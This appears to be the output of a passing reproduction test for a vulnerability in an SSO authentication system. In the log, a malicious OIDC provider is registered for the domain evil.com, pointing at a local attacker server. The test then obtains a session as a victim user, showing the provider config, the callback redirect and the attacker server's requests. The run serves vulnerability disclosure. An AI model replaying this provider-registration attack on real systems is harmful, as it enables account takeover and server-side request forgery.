RUN  v4.1.10 /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/repro/vuln stdout | repro-sso-ssrf.test.ts > SSO SSRF via real HTTP service > registers a malicious SSO provider and triggers SSRF + account takeover register response: 200 { "issuer": "http://127.0.0.1:9876", "oidcConfig": { "issuer": "http://127.0.0.1:9876", "clientId": "evil-client", "clientSecret": "evil-secret", "authorizationEndpoint": "http://127.0.0.1:9876/authorize", "tokenEndpoint": "http://127.0.0.1:9876/token", "tokenEndpointAuthentication": "client_secret_basic", "jwksEndpoint": "http://127.0.0.1:9876/jwks", "pkce": true, "discoveryEndpoint": "http://127.0.0.1:9876/.well-known/openid-configuration", "mapping": { "id": "sub", "email": "email", "emailVerified": "email_verified", "name": "name", "image": "picture" }, "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", "overrideUserInfo": false }, "samlConfig": null, "userId": "faxB6CYXPOPHQSgJ5JspcCb21VRAqtbD", "providerId": "evil-sso", "organizationId": null, "domain": "evil.com", "id": "apDmwe51Dvr4cQ6EjB86NB2YmKyxGzRe", "redirectURI": "http://localhost:3000/api/auth/sso/callback/evil-sso" } stdout | repro-sso-ssrf.test.ts > SSO SSRF via real HTTP service > registers a malicious SSO provider and triggers SSRF + account takeover callback status: 302 location: /dashboard stdout | repro-sso-ssrf.test.ts > SSO SSRF via real HTTP service > registers a malicious SSO provider and triggers SSRF + account takeover session: { "session": { "expiresAt": "2026-07-14T23:29:36.930Z", "token": "cQtGnEdgkqGZOYXAtjIUfeMNBsIgyghm", "createdAt": "2026-07-07T23:29:36.930Z", "updatedAt": "2026-07-07T23:29:36.930Z", "ipAddress": "127.0.0.1", "userAgent": "node", "userId": "4Awi9o26AAzG3jkKpHbYS7kLccerp8O2", "id": "Jw6aelWMd0lVEJ4301bBpysGBkoZ4wZy" }, "user": { "name": "Victim", "email": "victim@example.com", "emailVerified": true, "image": null, "createdAt": "2026-07-07T23:29:36.852Z", "updatedAt": "2026-07-07T23:29:36.930Z", "id": "4Awi9o26AAzG3jkKpHbYS7kLccerp8O2" } } attacker requests: [ { "method": "GET", "url": "/authorize?response_type=code&client_id=evil-client&state=F5BgHCUu4SdBtJiu02a77V3Ky-PlJ217&scope=openid+email+profile+offline_access&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso&code_challenge_method=S256&code_challenge=pH4_IabpXZmT0GNrwZeJpFz_bkz67oHHHRXi48exuiY", "body": "" }, { "method": "POST", "url": "/token", "body": "grant_type=authorization_code&code=attacker-code&code_verifier=TKgaJlT19eC9S0GtvGVnsEXzTEOyky2_H5qFa9iJZBZLonlxVPt7ASemudg8wtKIi8K6xj62gEchwrNh3ykVbysbsCG6-pwPQ3WjqzlIQZWYvv9AllysUY0h0miijuxR&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fsso%2Fcallback%2Fevil-sso" }, { "method": "GET", "url": "/userinfo", "body": "" } ] ✓ repro-sso-ssrf.test.ts (1 test) 144ms  Test Files  1 passed (1)  Tests  1 passed (1)  Start at  23:29:36  Duration  543ms (transform 20ms, setup 0ms, import 315ms, tests 144ms, environment 0ms)